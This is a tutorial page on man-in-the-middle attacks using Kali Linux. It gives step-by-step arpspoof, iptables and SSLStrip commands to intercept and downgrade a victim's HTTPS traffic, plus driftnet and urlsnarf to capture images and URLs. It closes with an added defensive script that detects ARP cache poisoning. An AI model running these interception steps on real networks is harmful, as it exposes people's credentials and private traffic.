Man in the middle attack for SSL connection
During this type of attack, two parties are communicating with one another, and an attacker inserts themselves into the conversation and attempts to alter or eavesdrop on it. The attacker has to be able to sniff traffic between the two parties. We will look at performing a man-in-the-middle attack using a utility called SSLStrip. We are using the Kali Linux distribution, as it already comes with all the necessary tools installed.

Utilities used

1. Enable IP forwarding so all traffic goes through our host; otherwise the user will lose connectivity

echo 1 > /proc/sys/net/ipv4/ip_forward

2. To tell the victim host that we (our MAC address) are now the one belonging to the IP of the gateway, enter the following command:

# arpspoof -t victim gateway

In a separate shell we start the matching command to fool the gateway into believing we are the victim.

# arpspoof -t gateway victim

3. Set up a firewall rule on the system to redirect traffic from port 80 to port 8080

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

4. Run sslstrip

sslstrip -l 8080

5. Access any SSL website on the target, then press Ctrl+C to stop the test. View the sslstrip.log file to see the information gathered.

Example of Man in the middle attack with driftnet and urlsnarf
We will try to view images that are being displayed in the web browser on the victim system. To do this we will run a man-in-the-middle attack.


1. If you need to discover IP addresses, you can scan the subnet with nmap. If you already know your target, go to step 2.

sudo nmap -sP

2. On the system from which you want to run the man-in-the-middle attack, open 3 terminal windows and run one of the following commands in each

sudo arpspoof -i eth0 -t
sudo arpspoof -i eth0 -t
sudo driftnet -i eth0

3. To catch URLs, run the following command

sudo urlsnarf -i eth0
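
From the defending side, the ARP spoofing that both procedures above depend on leaves a trace in the victim's ARP cache: the gateway IP maps to a new MAC, often one that another IP on the subnet also uses. The script below is an added example, not part of the original page; it parses a table in /proc/net/arp format, and the addresses, the baseline MAC and the function names are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page). Input: a file in /proc/net/arp format.

# Print the MAC cached for IP $2 in ARP table file $1 (nothing if absent).
mac_for_ip() {
    awk -v ip="$2" 'NR > 1 && $1 == ip { print tolower($4); exit }' "$1"
}

# Succeed when the gateway ($2) has a cached MAC that differs from the
# known-good baseline ($3). An absent entry counts as "not changed".
gateway_mac_changed() {
    current=$(mac_for_ip "$1" "$2")
    baseline=$(printf '%s' "$3" | tr 'A-Z' 'a-z')
    [ -n "$current" ] && [ "$current" != "$baseline" ]
}

# Print "MAC IP1,IP2,..." for each MAC that answers for more than one IP.
# Incomplete entries (all-zero MAC) are skipped.
shared_macs() {
    awk 'NR > 1 && $4 != "00:00:00:00:00:00" {
             mac = tolower($4)
             if (mac in ips) { ips[mac] = ips[mac] "," $1; count[mac]++ }
             else            { order[++n] = mac; ips[mac] = $1; count[mac] = 1 }
         }
         END {
             for (i = 1; i <= n; i++)
                 if (count[order[i]] > 1) print order[i], ips[order[i]]
         }' "$1"
}

# Constructed sample of a poisoned cache: gateway 192.0.2.1 and host
# 192.0.2.23 both resolve to the same MAC. All values are made up.
sample=$(mktemp)
trap 'rm -f "$sample"' EXIT
cat > "$sample" <<'EOF'
IP address       HW type     Flags       HW address            Mask     Device
192.0.2.1        0x1         0x2         02:00:00:00:00:66     *        eth0
192.0.2.23       0x1         0x2         02:00:00:00:00:66     *        eth0
192.0.2.40       0x1         0x2         02:00:00:00:00:40     *        eth0
192.0.2.41       0x1         0x0         00:00:00:00:00:00     *        eth0
EOF

shared_macs "$sample"
if gateway_mac_changed "$sample" 192.0.2.1 02:00:00:00:00:01; then
    echo "ALERT: 192.0.2.1 no longer maps to baseline MAC 02:00:00:00:00:01"
fi
```

On a live Linux host, pass /proc/net/arp instead of the sample file. Proxy ARP or a host with several addresses can also share a MAC, so treat a hit as a lead to verify against the baseline.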